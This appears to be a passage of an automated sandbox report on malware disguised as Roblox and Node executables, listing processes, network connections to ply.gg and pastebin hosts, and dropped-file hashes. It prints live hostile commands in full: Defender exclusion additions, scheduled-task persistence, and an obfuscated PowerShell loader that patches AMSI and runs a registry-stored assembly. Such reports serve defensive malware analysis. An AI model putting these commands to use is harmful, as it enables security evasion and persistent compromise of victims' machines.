PID 324 wrote to memory of 1460 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 1476 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1516 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1540 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 1644 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1680 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1736 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 1768 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 1848 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 1912 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1924 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 1940 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 2012 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 1700 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 2140 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 324 wrote to memory of 2248 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 2348 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 2404 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 324 wrote to memory of 2456 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 2468 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 2560 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 2648 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 324 wrote to memory of 2672 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 324 wrote to memory of 2688 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe"

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 3874f99676d2a171db1648b456c00305 AF6bVzg0Nk+Uob03FtQ14g.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST

C:\Windows\System32\$Node32.exe

"C:\Windows\System32\$Node32.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:NmGdSppURqqL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MQoQQivOdnqpQn,[Parameter(Position=1)][Type]$brBwrasQPu)$tNVMvHtSxhf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,S'+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+','+''+[Char](65)+'n'+'s'+''+'i'+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+','+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$tNVMvHtSxhf.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+'a'+''+'l'+'N'+[Char](97)+''+[Char](109)+'e'+[Char](44)+'Hid'+'e'+'By'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'ime,'+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');$tNVMvHtSxhf.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+''+'o'+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$brBwrasQPu,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+',M'+'a'+'na'+'g'+'e'+[Char](100)+'');Write-Output $tNVMvHtSxhf.CreateType();}$SOWVGuXakUZFC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+'t'+'e'+'m.'+[Char](100)+''+[Char](108)+'l')}).GetType('M'+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+'W'+'i'+''+'n'+''+[Char](51)+''+'2'+''+'.'+''+'U'+''+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+'h'+'o'+''+[Char](100)+'s');$vXuVyjDcpUaZxj=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+'r'+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+[Char](108)+'i'+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HGXpWVZeCoipORtRsmd=NmGdSppURqqL @([String])([IntPtr]);$ZDOxEshTmBMFRKRmZMmVew=NmGdSppURqqL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jGQpogqSIBl=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'o'+'d'+'ul'+'e'+'Han'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$zrftaLTEZxtDJV=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+'ib'+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$JHlGsvfaGyzWHbMmv=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object]('Vir'+[Char](116)+'ua'+'l'+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$WUegRNP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zrftaLTEZxtDJV,$HGXpWVZeCoipORtRsmd).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kykrGHgouzOPlRUcE=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$WUegRNP,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$PYOkbsexQE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,4,[ref]$PYOkbsexQE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kykrGHgouzOPlRUcE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,0x20,[ref]$PYOkbsexQE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](78)+'od'+[Char](101)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST

C:\Windows\System32\$Node2Json.exe

"C:\Windows\System32\$Node2Json.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST

C:\Windows\System32\$Node3Json.exe

"C:\Windows\System32\$Node3Json.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{f2983257-2dd5-4945-ba26-cc09f94ee010}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 visit-kill.gl.at.ply.gg udp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 8.8.8.8:53 every-bend.gl.at.ply.gg udp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp
US 147.185.221.23:51861 visit-kill.gl.at.ply.gg tcp
US 147.185.221.21:48150 every-bend.gl.at.ply.gg tcp

Files

memory/2568-0-0x00007FF891683000-0x00007FF891685000-memory.dmp

memory/2568-1-0x0000000000D90000-0x0000000000DF2000-memory.dmp

memory/2568-2-0x00007FF891680000-0x00007FF892142000-memory.dmp

memory/2064-12-0x0000011548060000-0x0000011548082000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m3m1p1a5.dma.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2064-13-0x00007FF891680000-0x00007FF892142000-memory.dmp

memory/2064-14-0x00007FF891680000-0x00007FF892142000-memory.dmp

memory/2064-15-0x00007FF891680000-0x00007FF892142000-memory.dmp

memory/2064-16-0x00007FF891680000-0x00007FF892142000-memory.dmp

memory/2064-19-0x00007FF891680000-0x00007FF892142000-memory.dmp

memory/2064-20-0x00007FF891680000-0x00007FF892142000-memory.dmp

C:\Windows\System32\$Node32.exe

MD5 b850f016450d68da0ae4bb945355f70c
SHA1 521726c38af715e6ee1c76315151f0ed9518c6f4
SHA256 8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24
SHA512 30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3eb3833f769dd890afc295b977eab4b4
SHA1 e857649b037939602c72ad003e5d3698695f436f
SHA256 c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512 c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b5bf6b0261deb53c0e3d422e3f83a664
SHA1 60cd83ab6dd15abaa9abf34d9ab54e42c8eefa16
SHA256 a431a9e84c64c6ad29339df6a714cb697081dc1c6c5557ada967d4caaeed0c1c
SHA512 27dfba0d2d7ebce4e6eebdeefa81b2518c5222efb9d37b4c323023e5117eed30ad6aeba8e062bde96d17d53b01bb9a59313229aeaf4863c8b30d9bbb09d46bff

C:\Windows\System32\$Node2Json.exe

MD5 41814c2aa6f0aaffaaaa26ffd07b3550
SHA1 ea9731c42a382ed003b5b4bfd28c3ba437c8d14a
SHA256 da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e
SHA512 f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d

memory/3788-70-0x0000000000850000-0x0000000000872000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 380667346230f568b33ee306d145cd0c
SHA1 761128658280c2f8070f879fe0173759e2147421
SHA256 34fd03e6c7b265c580eff0085960004daaa90c16473cbc236c263a453767c4c8
SHA512 32b89cffccf694b51872b9088759e3c6cd1e2c3fcbd0219b24fd1f7f191422fecaad6f77c9d57330281826c3609587cba942994de077662d9d1606a57f64a55b

C:\Windows\System32\$Node3Json.exe

MD5 391d4f99d0076ce566b370f1572ef670
SHA1 0bf04beb77440315098bacf30563a6542e254a45
SHA256 b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605
SHA512 1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497

memory/3280-100-0x00000000004C0000-0x00000000004E2000-memory.dmp

memory/2568-101-0x00007FF891680000-0x00007FF892142000-memory.dmp

memory/1300-104-0x00007FF8AF530000-0x00007FF8AF5ED000-memory.dmp

memory/1300-103-0x00007FF8AFAF0000-0x00007FF8AFCE8000-memory.dmp

memory/324-110-0x0000000140000000-0x0000000140008000-memory.dmp

memory/324-112-0x00007FF8AF530000-0x00007FF8AF5ED000-memory.dmp

memory/324-111-0x00007FF8AFAF0000-0x00007FF8AFCE8000-memory.dmp

memory/324-113-0x0000000140000000-0x0000000140008000-memory.dmp

memory/408-150-0x000001F94FF70000-0x000001F94FF9A000-memory.dmp

memory/400-164-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

memory/400-163-0x0000027C4C1C0000-0x0000027C4C1EA000-memory.dmp

memory/400-158-0x0000027C4C1C0000-0x0000027C4C1EA000-memory.dmp

memory/408-154-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

memory/408-153-0x000001F94FF70000-0x000001F94FF9A000-memory.dmp

memory/964-144-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

memory/964-143-0x000001F4F1DA0000-0x000001F4F1DCA000-memory.dmp

memory/964-138-0x000001F4F1DA0000-0x000001F4F1DCA000-memory.dmp

memory/676-133-0x0000020DDE630000-0x0000020DDE65A000-memory.dmp

memory/676-134-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

memory/676-128-0x0000020DDE630000-0x0000020DDE65A000-memory.dmp

memory/628-124-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp

memory/628-123-0x0000025298080000-0x00000252980AA000-memory.dmp

memory/628-118-0x0000025298080000-0x00000252980AA000-memory.dmp

memory/628-117-0x0000025298080000-0x00000252980AA000-memory.dmp

memory/628-116-0x0000025298050000-0x0000025298075000-memory.dmp

memory/324-107-0x0000000140000000-0x0000000140008000-memory.dmp

memory/324-108-0x0000000140000000-0x0000000140008000-memory.dmp

memory/324-105-0x0000000140000000-0x0000000140008000-memory.dmp

memory/324-106-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1300-102-0x00000147D7250000-0x00000147D727A000-memory.dmp

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 a9124c4c97cba8a07a8204fac1696c8e
SHA1 1f27d80280e03762c7b16781608786f5a98ff434
SHA256 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21
SHA512 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 4ac1741ceb19f5a983079b2c5f344f5d
SHA1 f1ebd93fbade2e035cd59e970787b8042cdd0f3b
SHA256 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc
SHA512 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 39b9eb9d1a56bc1792c844c425bd1dec
SHA1 db5a91082fa14eeb6550cbc994d34ebd95341df9
SHA256 acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692
SHA512 255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 c6086d02f8ce044f5fa07a98303dc7eb
SHA1 6116247e9d098b276b476c9f4c434f55d469129c
SHA256 8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0
SHA512 1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a

Analysis: behavioral19

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

92s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe"

Signatures

Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2024

Network

Country Destination Domain Proto
